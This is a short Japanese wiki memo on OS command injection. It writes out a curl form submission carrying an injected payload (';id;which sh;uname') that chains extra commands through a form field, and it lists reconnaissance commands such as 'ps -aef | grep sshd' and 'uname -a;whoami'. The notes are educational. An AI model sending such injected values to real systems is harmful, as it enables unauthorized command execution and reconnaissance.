*趣旨 [#y3c7eef5]
OSコマンドインジェクションの記事をみかけたので、メモしておく

*情報元 [#d217f9e5]
http://m1n0x.hp2.jp/blog/archives/179

*curlコマンド [#k290b156]
 curl -d comment=%3bid%3bwhich%20sh%3buname%

-dオプションはフォームの送信
 
**ユーザ情報を表示する [#h3666b7c]
 コマンドが実行されたユーザIDとグループID、
 shコマンドの実体のパス、
 CPU種別・ホスト名・OS名・OSのリリース番号・カーネルのバージョンが表示される

***formに埋め込むコマンド [#md633e20]
 %3bid%3bwhich%20sh%3buname%

***意味 [#la7a1f02]
 ";id;which sh;uname%"

|idコマンド|ユーザーIDやグループIDを表示する|
|whichコマンド|コマンドの絶対パスを知る|
|unameコマンド|OSの情報を知るのに使う|

*つかうコマンド [#be612729]

**全てのユーザのプロセス情報をツリー構造で表示し、それをgrepにかけてsshdが含まれる行を抽出 [#l59c5656]
 ps -aef |grep sshd


**システム名と実行したユーザーの名前を表示 [#p90fe8b8]
 uname -a;whoami

*URLエンコード・デコードフォーム [#f8c989ad]


**URL [#oc547158]
http://www.tagindex.com/tool/url.html
トップ   編集 差分 バックアップ 添付 複製 名前変更 リロード   新規 一覧 単語検索 最終更新   ヘルプ   最終更新のRSS